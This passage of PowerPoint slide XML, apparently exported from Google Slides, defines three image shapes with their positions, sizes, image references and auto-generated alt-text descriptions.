        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="0"/>
            <a:ext cx="4571975" cy="1587125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Text&#10;&#10;Description automatically generated" id="294" name="Google Shape;294;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2510525"/>
            <a:ext cx="4571975" cy="1121013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence" id="295" name="Google Shape;295;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3631550"/>
            <a:ext cx="4571975" cy="151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